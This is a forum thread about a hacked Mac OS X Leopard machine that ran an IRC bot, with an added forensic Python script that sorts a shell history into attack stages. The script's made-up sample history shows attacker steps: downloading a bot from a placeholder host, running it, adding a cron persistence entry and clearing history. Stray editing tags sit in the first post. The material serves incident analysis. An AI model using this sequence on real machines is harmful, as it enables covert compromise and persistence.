Leopard hack - what happened? bash history breakdown...

Discussion in 'macOS' started by aatawm, Dec 1, 2008.

  1. aatawm macrumors newbie

    Joined:
    Dec 15, 2006
    #1
    My Leopard box recently got hacked, and I'm trying to decipher what was done, and how dire my situation is.

    I thought it was a trojan that maybe my gf had downloaded, but from what I can tell there have been no downloaded files, and she says she didn't download or install (or authenticate) anything.

    Below is a link to my file server where I have the bash history as well as the original files (which can also be downloaded from the curl in the bash history).

    So what were they trying to do?

    Http://file.meyersproduction.com/botdarwin

    System specs:
</gml_replace>
<gr_replace lines="27" cat="clarify" orig="firewall off">
    Firewall off
    2.8 dual quad mac pro
    web sharing
    remote access (ssh)
    remote management (vpn)
    print sharing

    firewall off

    Ports were not routed to my system from the internet (local IPs had changed and hadn't been corrected to reach my box from the internet).

    I also have a DynDNS set up that forwards to my IP.

    Much thanks.
     
  2. priller macrumors regular

    Joined:
    Dec 15, 2007
    #2
    Looks like it installs an IRC bot called EnergyMech, most likely used for DDoS or spam.
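    The thread never gets past "it installs an IRC bot," so here is an added example of how to break a recovered bash history down by attack stage before drawing that kind of conclusion. This is editor-supplied code, not the poster's actual history and not anything from EnergyMech; the history lines inside it are constructed to look like a typical fetch / unpack / run / persist / cover-tracks sequence, and `example.invalid` is a reserved placeholder host, not the real download location.

```python
"""Triage a recovered shell history from a suspected compromise.

Added example for this thread: the CONSTRUCTED_HISTORY below is made up
to resemble an attacker's session and is not the poster's real file.
Each history line is matched against the stages an intruder usually
leaves behind (fetch, unpack, execute, persist, cover) so the session
can be read as a sequence of intent rather than a pile of commands.
"""
import re
from dataclasses import dataclass, field

# Constructed sample session (hypothetical; .b is a hidden working dir,
# example.invalid is a reserved placeholder hostname).
CONSTRUCTED_HISTORY = """\
w
uname -a
cd /tmp
curl -O http://example.invalid/bot.tgz
tar xzf bot.tgz
cd .b
chmod +x mech
nohup ./mech -f mech.conf &
echo '@reboot /tmp/.b/mech -f /tmp/.b/mech.conf' | crontab -
rm -f /tmp/bot.tgz
history -c
"""

# Stage name -> pattern. Order matters only for the report layout.
STAGES = [
    ("fetch", re.compile(r"^(curl|wget|ftp|fetch)\b")),
    ("unpack", re.compile(r"^(tar|unzip|gunzip|bunzip2)\b")),
    ("execute", re.compile(r"\bchmod\s+\+x\b|\bnohup\b|(^|[;&|]\s*)\./\S+")),
    ("persist", re.compile(
        r"\bcrontab\b|\blaunchctl\b|LaunchAgents|LaunchDaemons"
        r"|authorized_keys|/etc/rc")),
    ("cover", re.compile(
        r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\bHISTFILE="
        r"|^rm\s+.*\.(tgz|tar|gz|zip)\b|\brm\s+.*bash_history")),
]
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"]+")


@dataclass
class Triage:
    # stage -> list of (history line number, command)
    hits: dict = field(default_factory=lambda: {name: [] for name, _ in STAGES})
    # every URL seen, in order; these are what to fetch (carefully) for analysis
    urls: list = field(default_factory=list)


def triage_history(text: str) -> Triage:
    """Classify each non-empty history line into zero or more stages."""
    result = Triage()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        for stage, pattern in STAGES:
            if pattern.search(line):
                result.hits[stage].append((lineno, line))
        result.urls.extend(URL_RE.findall(line))
    return result


def indicators(t: Triage) -> list:
    """Turn stage hits into the short conclusions an analyst would write down."""
    notes = []
    if t.hits["fetch"] and t.hits["execute"]:
        notes.append("download-and-execute of a fetched payload")
    if t.hits["persist"]:
        notes.append("persistence mechanism touched (cron/launchd/ssh keys)")
    if t.hits["cover"]:
        notes.append("anti-forensics: history cleared or payload removed")
    if t.hits["fetch"] and not t.hits["execute"]:
        notes.append("payload fetched but no execution seen; check other shells/users")
    return notes


def report(text: str) -> str:
    t = triage_history(text)
    out = []
    for stage, _ in STAGES:
        out.append(f"[{stage}]")
        for lineno, line in t.hits[stage]:
            out.append(f"  {lineno:>4}: {line}")
    out.append("[urls] " + ", ".join(t.urls))
    out.append("[indicators] " + "; ".join(indicators(t)))
    return "\n".join(out)


if __name__ == "__main__":
    # Usage: python3 triage.py  (or feed ~/.bash_history through report())
    print(report(CONSTRUCTED_HISTORY))
```

    Two caveats when reading the result against a real ~/.bash_history: bash only writes the file on a clean shell exit, and `history -c` or `unset HISTFILE` stops it being written at all, so what survives is what the attacker failed to cover, not the whole session; and unless HISTTIMEFORMAT was set the file carries ordering but no timestamps, so the line numbers give sequence, not time.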
     
  3. mountainbiker80 macrumors member

    Joined:
    Sep 8, 2007
    #3
    Happened on my server

    I'm running OS X Server 10.5. Same thing happened to me. I have very strict password policies, and also had a web server running.

    Did you ever figure out how it happened or what it was doing? Did you end up reimaging?
     
  4. aatawm thread starter macrumors newbie

    Joined:
    Dec 15, 2006
    #4
    Reimaged

    I never figured out the attack vector, and ended up just reinstalling from scratch, which I was due for anyway...
     
  5. mountainbiker80 macrumors member

    Joined:
    Sep 8, 2007
    #5
    Thanks, man, for the quick reply. I'm going to end up reinstalling anyway too. Just confused as to how it happened in the first place, especially considering there isn't much info on this (from what I'm getting on Google, etc.).
     
